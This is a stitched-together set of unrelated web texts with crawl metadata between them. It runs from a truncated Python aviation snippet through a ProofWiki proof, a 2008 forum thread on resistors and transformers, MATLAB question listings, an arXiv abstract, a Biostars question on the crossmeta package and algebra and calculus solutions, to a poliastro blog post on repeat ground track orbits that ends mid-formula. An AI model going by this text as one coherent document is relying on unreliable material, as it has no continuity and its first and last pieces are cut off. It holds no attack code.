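    """Height (ft) above touchdown at a given distance to go:
    height = 6076 ft/NM x distance x tan(glide path angle)."""
    return 6076.0 * dist_nm * math.tan(math.radians(glidepath_deg))

print(crosswind_component(20, 30))  # ~10 kt: half the wind at 30 deg off
print(crosswind_component(20, 60))  # ~17 kt: about 90% of the wind
print(height_on_path(5))            # ~1592 ft at 5 NM: ~318 ft per NM
```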
https://proofwiki.org/wiki/Equivalence_of_Definitions_of_Closed_Element
# Equivalence of Definitions of Closed Element ## Theorem Let $\struct {S, \preceq}$ be an ordered set. Let $\cl$ be a closure operator on $S$. Let $x \in S$. The following definitions of the concept of Closed Element are equivalent: ### Definition 1 The element $x$ is a closed element of $S$ (with respect to $\cl$) if and only if $x$ is a fixed point of $\cl$: $\map \cl x = x$ ### Definition 2 The element $x$ is a closed element of $S$ (with respect to $\cl$) if and only if $x$ is in the image of $\cl$: $x \in \Img \cl$ ## Proof Let $\struct {S, \preceq}$ be an ordered set. Let $\cl: S \to S$ be a closure operator on $S$. Let $x \in S$. By the definition of closure operator, $\cl$ is idempotent: $\cl \circ \cl = \cl$. Suppose $x$ is a fixed point of $\cl$, that is, $\map \cl x = x$. Then $x$ is the image of itself under $\cl$, so $x \in \Img \cl$. Conversely, suppose $x \in \Img \cl$. Then $x = \map \cl y$ for some $y \in S$, and by idempotence: $\map \cl x = \map \cl {\map \cl y} = \map \cl y = x$ Thus $x$ is a fixed point of $\cl$. Hence an element of $S$ is a fixed point of $\cl$ if and only if it is in the image of $\cl$, and the above definitions are equivalent. $\blacksquare$
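As an illustrative sanity check (not part of the ProofWiki article), the following Python sketch verifies the equivalence for one concrete closure operator: mapping a finite set of integers, ordered by inclusion, to the full interval it spans.

```python
from itertools import combinations

def cl(xs):
    """A closure operator on subsets of integers ordered by inclusion:
    send a set to the interval [min, max] it spans. This map is
    inflationary, monotone, and idempotent."""
    return frozenset(range(min(xs), max(xs) + 1)) if xs else frozenset()

universe = range(4)
subsets = [frozenset(c) for r in range(5) for c in combinations(universe, r)]
fixed_points = {s for s in subsets if cl(s) == s}   # Definition 1
image        = {cl(s) for s in subsets}             # Definition 2
assert fixed_points == image                        # the definitions agree
```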
https://www.physicsforums.com/threads/resistors-vs-transformers.282261/
Resistors vs transformers 1. Dec 31, 2008 RalphM Hello, I am new here and this looks like a good place to get answers! Wondering if someone could clarify something for me. When withdrawing current from a socket to an electrical device, the current is determined by I = V/R. So the manufacturer of the device can add resistors to manipulate the current going through. Correct? My second question is that instead of adding resistors to decrease current, can the manufacturer just add a transformer instead which will decrease voltage to produce the same current, and if so, does that mean that transformers and resistors can be interchangeable for this particular application? Would there be a preference for using either? 2. Dec 31, 2008 Naty1 Hello Ralph...sounds like you may be beginning to study electricity!! Sometimes this is done, but in practice it is avoided because the resistor utilizes power....and gives off heat...to no purpose....much more efficient to design the circuit for minimum power (minimum current) use....Such impedance matching might be more practical in amplifiers for very low power applications.... Sure, but that becomes expensive.. a smart designer would avoid such a costly application. And again, the solution depends on the application... Consider light bulbs, for example... Many materials might be used, but it turns out tungsten in a vacuum has the longevity and resistance characteristics to work pretty well. Yet a fluorescent (gas) type bulb is considerably more efficient and hence can support the additional cost of a "ballast"....see wikipedia, fluorescent lamp, for a more complete discussion. (This also spreads toxic mercury.) 3. Dec 31, 2008 stewartcs Not quite, using a transformer to reduce the voltage will increase the current proportionately since the power the load uses is the same (think conservation of energy). By halving the voltage the current in the secondary will be doubled: $$\frac{V_p}{V_s} = \frac{I_s}{I_p}$$ The benefit of a transformer would be to reduce transmission line losses since they are equal to I^2R. Hence, pumping up the voltage and sending the same VA will reduce the current and thus the line loss. Hope this helps. CS 4. Jan 1, 2009 montoyas7940 If he were to use a transformer to lower the voltage applied to a resistive load the current and power would both decrease. Current through the transformer secondary will be determined by the load. (up to a point ) I = E/R and P = IE 5. Jan 1, 2009 RalphM Thank you for the responses! I'm still not clear on a few things: For example: Let's say a manufacturer creates a device and minimizes the resistance of it as much as possible to minimize power losses. Since the resistance of this device is constant and the voltage from the socket is also constant, the current/power through the device are determined by I = V/R and P = VI and are both fixed. What if the current/power is too much for the device to work properly? What is done to extract the required amount of power/current from the socket while keeping the resistance at the minimum? Also, what determines the amount of power required by the device in the first place? Responses are appreciated! HAPPY NEW YEAR! 6. Jan 1, 2009 stewartcs True, however, the load (or component) is designed to work under specific conditions (i.e. requires a certain amount of power to operate properly).
So given that the power is constant in the load (or within some design range), one cannot simply reduce the voltage arbitrarily (and thus the current in the secondary and the power the load draws) to limit the current. The complete circuit would need to be designed with all of that in mind, which probably wouldn't be the most practical way to limit current. Good point though. CS 7. Jan 1, 2009 stewartcs Happy New Year to you too! Most devices work within some power range (i.e. a minimum requirement for it to work and a maximum that it can withstand). If the power (some combination of current and voltage) is too little or too much, the device will not operate or it will fail. Hence, the device must be designed with this in mind. In other words, the designer will ensure that the device's resistance is such that at the operating voltage it will not draw too much power (beyond the device's limit), or too little power (not enough to operate). Hope this helps. CS 8. Jan 1, 2009 Staff: Mentor Welcome to the PF, RalphM! 9. Jan 1, 2009 Integral Staff Emeritus Electronic devices are designed to perform a task. The accomplishment of that task is the primary concern of the designer. Power consumption by a device is determined by the various electronic components used to accomplish the design goals. A good design will keep power consumption to a minimum while accomplishing the original task. A device uses exactly as much current, or power if you wish, as it needs. The power supply does not control the amount of current drawn unless the capabilities of the supply are exceeded. The current draw is determined by the load. For example, you can run your tape player on your car's 12 V battery even though it only draws a few hundred milliamps. The battery is capable of driving the starter motor which can draw nearly 100 amps. Perhaps Ivan Seeking will drop in and discuss some of the methods he has used to extend battery life when the current draw of a circuit is high. 10. Jan 1, 2009 RalphM Thanks guys you've cleared up a lot. I feel I'm starting to get a deeper understanding. I'm still a bit unclear about power consumption. For example: Let's say you connect the hot and neutral of your 120VAC socket with a 1 Ohm wire. Then I = 120 Amps from I = V/R. Power = 14400 Watts from P = VI. Does this mean that you are losing/wasting 14400 Watts of power? If you use a 10 Ohm wire instead of the 1 Ohm wire then I = 12 amps and power is 1440 Watts. It seems that the conclusion to be drawn is that you save on power by using a wire (or device) with higher resistance. This doesn't seem correct. Can someone please point out the logical flaw? 11. Jan 1, 2009 Redbelly98 Staff Emeritus There is no flaw, your conclusions are entirely correct. 12. Jan 2, 2009 montoyas7940 If the wire is intended to be the power consuming device this is correct. You have described as an example a simple resistance heater. All of the electrical power is converted to heat. Just for fun you could pull one of the heating elements out of your stove and measure the resistance. Your statement may not seem correct to you because you are only considering a wire. If you have a VERY low resistance wire providing electricity to a 10 ohm load then (for the most part) the 10 ohm load is what determines the power consumed. (This is only if the source is adequate of course) The wire is not as significant. In real world applications such as the electrical circuits in your house the resistance of the wiring has to be considered.
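RalphM's numbers are a direct application of Ohm's law. A quick Python check (not from the thread) of the 120 V socket example:

```python
def socket_draw(v, r):
    """Current and power for a resistive load on a fixed-voltage source:
    I = V/R, P = V*I (equivalently V**2/R)."""
    i = v / r
    return i, v * i

for r_ohms in (1, 10, 100):
    i, p = socket_draw(120.0, r_ohms)
    print(f"R = {r_ohms:>3} ohm -> I = {i:6.1f} A, P = {p:8.1f} W")
# R =   1 ohm -> I =  120.0 A, P =  14400.0 W
# R =  10 ohm -> I =   12.0 A, P =   1440.0 W
# R = 100 ohm -> I =    1.2 A, P =    144.0 W
```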
If you have a load that is large (low resistance) then you need lower resistance wire providing the power. Normally this is done with larger gauge wire or using copper instead of aluminum. If the wire is inadequate it will heat because it is consuming power. The term used for the adequacy of wire is ampacity. 13. Jan 2, 2009 RalphM The hot and neutral wires have a resistance, and that resistance is the minimum that a circuit can have, assuming you connect them with a wire having 0 Ohm. Does that mean that the maximum power that can be extracted from an outlet is constant and can be calculated as follows: V = 120V R = Rmin (resistance of hot and neutral wires) I = 120 / Rmin P = (120 * 120) / Rmin And let's say that you did connect them with the 0 Ohm wire, what happens to all the power? Does it just all get wasted into the earth (except for a small amount that heats the hot and neutral wires)? 14. Jan 2, 2009 montoyas7940 Yes, but you will trip the circuit over-current protection before you reach the theoretical max current. 15 amps at 14 AWG copper wire for example. This is called a short circuit and without circuit over-current protection the conductors will be destroyed by the heat, thus opening the circuit and perhaps burning down the house. 15. Jan 2, 2009 RalphM In your reply to the first paragraph you mention "circuit protectors" and in the second you mention circuit "over-current protection". Is this the same thing? Thanks for the replies you've helped a lot. 16. Jan 2, 2009 montoyas7940 Yes, sorry to have been unclear. Circuit over-current protection is often circuit breakers or fuses. There are many different types and applications. I am very glad if I have helped, you are welcome. Edit: I fixed post 14 Last edited: Jan 2, 2009 17. Jan 2, 2009 Staff: Mentor BTW, a general comment on power transfer.... Do not forget to include the source impedance in your calculations. True, for AC mains power distribution, the source impedance is pretty low, but it is not negligible. For example, have you ever seen your lights flicker briefly as a high-current motor appliance starts up (like your garage compressor, or your workshop table saw)? That's due to source voltage droop at the high-current part of the motor startup. EDIT -- The Rsource I'm mentioning is a combination of the impedance of the power pole distribution transformer (low) plus the resistance of the wiring getting down into the home and out into the various branches in the home. 18. Jan 2, 2009 montoyas7940 Here is an example of the effects of a short circuit: I don't know if I can say where specifically, but a large research facility here in the south uses large motors (about 44,000 hp each). They are synchronous motors and on shutdown an operator (not me, I don't work there) did not shut down the stator current. The result was, as the motor slowed and the back emf dropped to zero, the current through the stator tried to approach the theoretical limit. As you might imagine the source is large and the stator windings are (well... were) large. The supply transformer has over-current protection but it was configured improperly, so it did not trip and was destroyed. The line from TVA is 161,000 volts; it was damaged also before the substation providing the 161k shut down. Large holes were blown in the motor frame (several inches thick) and the windings were vaporized. Not your typical pinched extension cord, but yet the same in theory. 19.
Jan 2, 2009 Staff: Mentor You can actually use this fact to understand why a low resistance draws more power in a home circuit. The maximum power transfer is always obtained when the source impedance matches the load impedance. Voltage sources are inherently low impedance, so low load impedances result in high power for a voltage source. On the other hand, current sources are inherently high impedance, so high load impedances give high power for a current source.
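The maximum power transfer point is easy to see numerically. A small sketch (not from the thread; the 0.5-ohm source resistance is an illustrative assumption):

```python
def load_power(v_src, r_src, r_load):
    """Power delivered to the load in a simple series circuit:
    I = V / (R_src + R_load), P_load = I**2 * R_load."""
    i = v_src / (r_src + r_load)
    return i**2 * r_load

r_src = 0.5  # assumed source (transformer + wiring) resistance, ohms
for r_load in (0.1, 0.25, 0.5, 1.0, 5.0):
    print(r_load, round(load_power(120.0, r_src, r_load), 1))
# Delivered power peaks at r_load == r_src (here 0.5 ohm -> 7200 W),
# even though total dissipation keeps rising as r_load drops.
```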
http://stackexchange.com/filters/29247/matlab
Matlab ## Image stitching using the Harris corner detector in matlab I want to create a panorama from multiple photos in a matlab image. I'm finding out about "Image Stitching". Hope you can give me detailed instructions. ## regionprops vs. findContours Is there a way to get the same results for cDist=regionprops(bwImg, 'Area'); and openCV's findContours? Here is what I have tried so far: dst.convertTo(dst,CV_8U); ... ## How to read hdf data in Octave I am doing a project in remote sensing. Working with HDF on matlab is very easy. But I want to implement this with grid computing (Ubuntu). So I am trying with Octave. I have HDF4 files of chlorophyll. ... ## Matlab and Mathematica : Finding the density function The pdf of a standard Gamma distribution is $f(x) = \frac{x^{\gamma-1} \exp(-x)}{\Gamma(\gamma)}$. How do I find the pdf of the random variable Z = X + Y where Y is the Normal distribution? There ... ## Do 1-D convolution along each row of a matrix Did a quick search and couldn't find much about this. Say I have a 2D matrix and a 1D 'response function'. I want to convolve each row of the 2D matrix with the response function. I can do this by: ... 1 answers | 2 hours ago by Draper on stackoverflow.com ## Quickly and efficiently calculating an eigenvector for known eigenvalue Short version of my question: What would be the optimal way of calculating an eigenvector for a matrix A, if we already know the eigenvalue belonging to the eigenvector? Longer explanation: I have ... ## Sorting two column vectors into 3D matrix based on position Using the imfindcircles function in MATLAB to track circles in two images. I start with approximately a grid of circles which deforms. I am trying to sort the two column vector from imfindcircles into ... 1 answers | 2 hours ago by Cryptomnesia on stackoverflow.com ## Mode in each row closest to first index - MATLAB I have a matrix of numbers and I want to find the mode of each row, however I want to use the item closest to index 1 if there are multiple modes (the built-in function just uses the smallest value) for ... 1 answers | 2 hours ago by Alex Musk on stackoverflow.com ## Matching images with different orientations and scales in MATLAB I have two images that are similar but differ in orientation and size. One example can be seen below: Is there a way to match the two images? I have used Procrustes shape analysis, but are there ... ## Absorption Refrigerator evaporator code error I'm an undergraduate student working on a simulation for an absorption refrigerator. I found this PhD level thesis that had MATLAB code for the evaporator for an absorption refrigeration system, which ... ## Iterative closest point (ICP) for Matlab with Covariance computation Does anybody know an implementation of the Iterative Closest Point (ICP) algorithm in Matlab that computes the covariance matrix? All I have found is the icptoolboxformatlab but it seems to be ... 1 answers | 4 hours ago by Marvin Dietsch on stackoverflow.com ## How to plot data from scope that is used in external mode simulation? I have a simulink model connected to my hardware and I am able to see the response on my scope when I change the setpoints in my model etc. But I would like to save this data from the scope so that ... ## How to find integral under the noise power spectrum in matlab I have the 2D noise power spectrum (matrix). How can I get the integral under the noise spectrum in Matlab? Will the sum of the matrix elements alone give me the integral? I am doing this to evaluate the correctness ...
## How to make scrolling up in 2014a Matlab Command Prompt case sensitive? In the Matlab command prompt, "scrolling" up by the arrow up key or mouse scroll with a starting string already entered will roll back to the last commands with the same starting string. I am using ... ## array contains values of sample wav file in python or matlab I'm new at python and matlab, I tried to program using both language I couldn't get the right result. I want take a wav file as input and give an array which contains values of samples of the audio ... ## Alternate between Executing a MATLAB file and a Python script I have a MATLAB file that currently saves its variables into a .mat workspace. The python script uses SciPy.io to read these variables from the workspace. The python script performs some operations ... 1 answers | 5 hours ago by Borat.sagdiyev on stackoverflow.com ## How to eliminate the errors around edge boundaries after cutting out the Image? I'm making an image processing project which has a 6-step algorithm and I'm stuck in one of these. First off all, the platform I using is MATLAB, so if you can supply some samples it would be great. ... ## Plot a big figure with many subfigures in matlab I have to print a large poster, containing a matrix of figures, and it would be very practical for me to let MATLAB arrange them. Unluckily, subplots are displayed to fit a certain figure size, so are ... ## openCV and cvBlobs not giving same results as matlab here is my matlab code: % Calculate each separated object area cDist=regionprops(bwImg, 'Area'); cDist=[cDist.Area]; % Label each object [bwImgLabeled, ~]=bwlabel(bwImg); % ... ## Proper way to add noise to signal In many areas I have found that while adding noise, we mention some specification like zero mean and variance. I need to add AWGN, colored noise, uniform noise of varying SNR in Db. The following code ... 3 answers | 9 hours ago by SKM on stackoverflow.com ## Error: Undefined function or variable “B” when trying to find zeros of a function I'm having a little trouble evaluating B in the function bidfn. More specifically, I have been unable to find the zeroes of C from the nested function ptesta. Just for some context, Dmr is the ... ## Implicit Euler method Consider the initial value problem The formula for the backward Euler method is given by the formula: for a uniform partition of [a,b] with step h=(b-a)/N with ρ=0. At each step we will have to ... 10 hours ago by evinda on stackoverflow.com ## Function name conflict. How to call a MATLAB toolbox function instead an user-defined function I have a problem that I could solve by changing my function's name. But I want to know if there's an option to call a MATLAB-defined function which has the same name of my user-defined function. By ... 2 answers | 10 hours ago by Vitrion on stackoverflow.com ## Matlab: crop image with a sliding window? does anybody know how to crop an image with a sliding window in Matlab? e.g. I have an image of 1000x500 pixels, I would like to crop from this image blocks of 50x50 pixels... Of course I have to ... ## Constrained Local Model (CLM) – How can I compute the response map I try to implement a facial feature detector with a CLM following the paper of Cootes et. al. ('Feature Detection and Tracking with Constrained Local Models' and 'Automatic feature localization with ... ## Custom Matlab chi-square for 50 numbers Do you know if it is possible to create a custom Matlab chi-square function for 50 numerical values, ordered in a single column? 
Because I do not need the in-built one and I need to carry out a ... 1 answers | 10 hours ago by Atanas on stackoverflow.com ## Matlab Fspecial Filtering an Image How can I use fspecial to apply an averaging filter to the image clown? I have loaded the clown image into matlab and I have written h=fspecial('average', 3). Now how do I use h to apply the ... 2 answers | 10 hours ago by jerry2144 on stackoverflow.com ## How can rectangular bounding box from regionprops(Image,'BoundingBox') in Matlab? I want to make a bounding box around a person in an image, I tried different methods but I couldn't get the solution that I want. Here's the image I am using: Here's the code I have written so ...
2015-03-27 08:38:52
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5068457126617432, "perplexity": 1183.4041920977318}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-14/segments/1427131295993.24/warc/CC-MAIN-20150323172135-00020-ip-10-168-14-71.ec2.internal.warc.gz"}
http://cpr-condmat-suprcon.blogspot.com/2013/05/13054427-takuya-nomoto-et-al.html
## Effect of magnetic criticality and Fermi-surface topology on the magnetic penetration depth    [PDF]

Takuya Nomoto, Hiroaki Ikeda

We investigate the effect of anti-ferromagnetic (AF) quantum criticality on the magnetic penetration depth $\lambda(T)$ in line-nodal superconductors, including the cuprates, the iron pnictides, and the heavy-fermion superconductors. The critical magnetic fluctuation renormalizes the current vertex and drastically enhances the zero-temperature penetration depth $\lambda(0)$; the enhancement is more remarkable in the iron-pnictide case due to the Fermi-surface topology. The additional temperature ($T$) dependence of the current renormalization makes the expected $T$-linear behavior at low temperatures approach $T^{1.5}$ asymptotically. These anomalous behaviors are consistent with experimental observations. We stress that $\lambda(T)$ is a good probe for detecting the AF quantum critical point in the superconducting state. View original: http://arxiv.org/abs/1305.4427
2017-08-23 04:17:39
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7376086115837097, "perplexity": 3444.1285884540066}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-34/segments/1502886117519.92/warc/CC-MAIN-20170823035753-20170823055753-00199.warc.gz"}
https://www.biostars.org/p/438641/
Trouble using get_raw() function in crossmeta R package to extract GEO data for differential expression analysis

Posted 13 months ago

Hello, I am attempting to perform a meta-analysis of Gene Expression Omnibus (GEO) data with the crossmeta R package from Bioconductor. My issue is that when I attempt to download/unzip the GEO raw data with the get_raw() function, I get the error demonstrated below (here I am simply attempting the analysis from the vignette in order to troubleshoot):

library(crossmeta)
data_dir <- file.path(getwd())
# gather all GSEs
gse_names <- c("GSE9601", "GSE15069", "GSE50841", "GSE34817", "GSE29689")
# gather Illumina GSEs (see 'Checking Raw Illumina Data')
illum_names <- c("GSE50841", "GSE34817", "GSE29689")
get_raw(gse_names, data_dir)

which returns the following for every series in gse_names:

https://ftp.ncbi.nlm.nih.gov/geo/series/GSE9nnn/GSE9601/suppl/
No supplemental files found.
Check URL manually if in doubt
https://ftp.ncbi.nlm.nih.gov/geo/series/GSE9nnn/GSE9601/suppl/

This is despite the fact that supplemental files for all of these series (GSEs) do exist. I have attempted this on other series as well, to no avail. Any assistance would be much appreciated.

Additional note: the function getGEOSuppFiles() (from the GEOquery package) is used in the source code of get_raw(), and getGEOSuppFiles() on its own works completely fine.

Tags: R crossmeta meta-analysis gene-expression

Comment: Exactly the same problem I am facing. Anybody's help would be much appreciated.
2021-06-22 13:45:06
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3950970768928528, "perplexity": 11365.580574319425}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-25/segments/1623488517820.68/warc/CC-MAIN-20210622124548-20210622154548-00285.warc.gz"}
https://www.gradesaver.com/textbooks/math/algebra/elementary-and-intermediate-algebra-concepts-and-applications-6th-edition/chapter-4-polynomials-4-7-polynomials-in-several-variables-4-7-exercise-set-page-283/12
## Elementary and Intermediate Algebra: Concepts & Applications (6th Edition)

Published by Pearson

# Chapter 4 - Polynomials - 4.7 Polynomials in Several Variables - 4.7 Exercise Set: 12

#### Answer

$85$

#### Work Step by Step

Substitute the given values of the variables ($x=5$ and $y=-2$) to obtain:
$x^2+5y^2-4xy \\=5^2+5(-2)^2-4(5)(-2) \\=25+5(4)-(-40) \\=25+20+40 \\=85$
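A quick way to sanity-check a substitution like this is to evaluate the expression directly; here is a tiny Python check (our addition, with the values read off the work above):

```python
# Evaluate x^2 + 5y^2 - 4xy at the given values
x, y = 5, -2
print(x**2 + 5*y**2 - 4*x*y)   # 85, matching the answer
```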
2018-08-19 22:03:35
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7209888696670532, "perplexity": 2898.860499198831}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-34/segments/1534221215393.63/warc/CC-MAIN-20180819204348-20180819224348-00654.warc.gz"}
http://mathhelpforum.com/math-challenge-problems/90074-techniques-integration-6-a.html
1. Techniques of integration (6)

Let $f: \mathbb{R} \longrightarrow \mathbb{R}$ be continuous and periodic with period $T > 0.$ For any real numbers $a < b,$ evaluate $\lim_{n\to\infty} \int_a^b f(nx) \, dx.$

2. Originally Posted by NonCommAlg: Let $f: \mathbb{R} \longrightarrow \mathbb{R}$ be continuous and periodic with period $T > 0.$ For any real numbers $a < b,$ evaluate $\lim_{n\to\infty} \int_a^b f(nx) \, dx.$

Hi NonCommAlg. A continuous function is integrable, and the integral over a bounded interval of an integrable periodic function is bounded. Hence, using the substitution $u=nx,$

$\lim_{n\to\infty}\int_a^b f(nx)\,dx = \lim_{n\to\infty}\frac1n\int_{na}^{nb}f(u)\,du = 0,$

since the integral is bounded. Something tells me I may have done something wrong, because, well, surely it can't be that simple …

3. Originally Posted by TheAbstractionist: Hi NonCommAlg. A continuous function is integrable, and the integral over a bounded interval of an integrable periodic function is bounded. Hence, using the substitution $u=nx,$ $\lim_{n\to\infty}\int_a^b f(nx)\,dx = \lim_{n\to\infty}\frac1n\int_{na}^{nb}f(u)\,du.$

I'd agree with that approach up to that point, but I wouldn't go on to say that the limit is 0, because the length of the interval (in the u-integral) is getting unboundedly long. Let $f_{\text{av}} = \frac1T\int_0^T f(x)\,dx$ be the mean value of $f$ over one period. Then the interval $[na,nb]$ consists of $\frac{n(b-a)}{T}$ subintervals of length $T$ (not counting odd bits at the ends, which we can dispose of with epsilons). So $\frac1n\int_{na}^{nb}f(u)\,du \approx (b-a)f_{\text{av}}.$ That's my candidate for the limit.

4. Originally Posted by Opalg: I'd agree with that approach up to that point, but I wouldn't go on to say that the limit is 0, because the length of the interval (in the u-integral) is getting unboundedly long.

Aha, that was where I went wrong. I knew I had made a mistake somewhere but just couldn't see where. Thanks, Opalg.

5. Originally Posted by Opalg: [as above]

Opalg's candidate, which is $\frac{b-a}{T} \int_0^T f(x)\,dx,$ is the correct answer. Here's a more detailed solution:

$\int_a^b f(nx)\,dx = \frac{1}{n}\int_{na}^{nb} f(u)\,du = \frac{1}{n}\left[\sum_{k=0}^{m-1} \int_{na+kT}^{na+(k+1)T} f(u)\,du + \int_{na+mT}^{nb} f(u)\,du\right],$

where $m$ is the integer with $na+mT < nb \leq na+(m+1)T. \quad (1)$

But $\int_{na+kT}^{na+(k+1)T} f(u)\,du = \int_0^T f(u)\,du,$ since $T$ is the period of $f.$ Thus:

$\int_a^b f(nx)\,dx = \frac{m}{n}\int_0^T f(u)\,du + \frac{1}{n}\int_{na+mT}^{nb} f(u)\,du. \quad (2)$

From (1) we also have $\lim_{n\to\infty}\frac{m}{n} = \frac{b-a}{T},$ which completes the proof because $f$ is bounded, say by $K,$ and thus:

$\left|\frac{1}{n}\int_{na+mT}^{nb} f(u)\,du\right| \leq (nb-na-mT)\,\frac{K}{n} = \left(\frac{b-a}{T} - \frac{m}{n}\right) KT.$

Hence $\lim_{n\to\infty}\frac{1}{n}\int_{na+mT}^{nb} f(u)\,du = 0,$ and the result follows from (2).
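As a numerical illustration of the result (our addition, not part of the original thread), here is a small Python sketch that checks the answer $\frac{b-a}{T}\int_0^T f$ for the periodic function $f(u)=2+\sin u$, period $T=2\pi$; the quadrature routine and parameter choices are ours:

```python
import math

# For f(u) = 2 + sin(u), T = 2*pi, the limit should be (b-a)*f_av = 2*(b-a).
def integral(g, a, b, steps=200000):
    h = (b - a) / steps                       # crude midpoint rule
    return h * sum(g(a + (k + 0.5) * h) for k in range(steps))

f = lambda u: 2.0 + math.sin(u)
a, b, T = 0.3, 1.1, 2 * math.pi
f_av = integral(f, 0.0, T) / T                # mean over one period (= 2)
for n in (1, 10, 100, 1000):
    print(n, round(integral(lambda x: f(n * x), a, b), 6), (b - a) * f_av)
# the first column of integrals approaches (b-a)*f_av = 1.6 as n grows
```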
2016-12-04 15:32:54
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 33, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9779096841812134, "perplexity": 306.0106315682325}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-50/segments/1480698541322.19/warc/CC-MAIN-20161202170901-00314-ip-10-31-129-80.ec2.internal.warc.gz"}
https://blog.poliastro.space/2020/06/28/2020-06-28-What-we'-ve-been-working-on-these-days!/
You are seeing the poliastro blog. If you want to see documentation, the latest version can be found at docs.poliastro.space.

# What we've been working on these days!

Hey, folks! I hope everyone is okay out there. Today, I am going to explain a little bit about repeat ground track orbits and the value that lies behind them.

Orbits with repeating ground tracks play a significant role in space engineering. Ground tracks that repeat according to some pattern have meaningful applications in remote sensing missions, reconnaissance missions, and numerous rendezvous and docking opportunities with an orbiting spacecraft. Because they overfly the same points on the planet's surface every repeat cycle, they suit missions such as those studying gravity, the atmosphere, or the movement of the polar ice cap. So, as you might imagine, this is amazing: in a way, the data we consume relies on these orbits. As mentioned before, repeat ground track (RGT) orbits allow a satellite to reobserve the same area after a repeat cycle.

# So how do we do it?

An RGT orbit is usually specified by an integer number of days $D$ and an integer number of orbits $R$ in the repeat cycle. Once we know the repeat pattern the user wants, we calculate the mean semimajor axis $a$ required for a repeating ground track orbit using an algorithm devised by Carl Wagner, and we iterate on $a$ until we reach the desired approximation. For further information, refer to Fundamentals of Astrodynamics and Applications, 4th ed., by David A. Vallado.

This algorithm starts with the following initial guess for the required mean semimajor axis:

$$a_{o}= \mu^\frac{1}{3}[(\frac{R}{D})\omega_{b}]^{-\frac{2}{3}}$$

and iteratively improves the semimajor axis with the following update:

